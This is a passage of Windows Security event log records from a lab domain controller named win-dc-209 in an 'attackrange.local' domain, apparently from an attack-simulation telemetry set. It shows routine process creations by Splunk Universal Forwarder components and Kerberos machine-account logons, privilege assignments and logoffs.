Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264133
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264134
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264135
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264137
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264136
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264139
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BF282
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51879
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264138
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF282
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264141
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BF8F8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264140
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF8F8
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 02:51:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264142
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF282
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264145
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C05A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264144
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C05A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62338
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264143
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C05A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264147
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264146
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264148
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264149
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264150
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264152
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264151
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264158
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C3517
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264157
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C3517
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62346
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264156
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C3517
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264155
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C34AB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
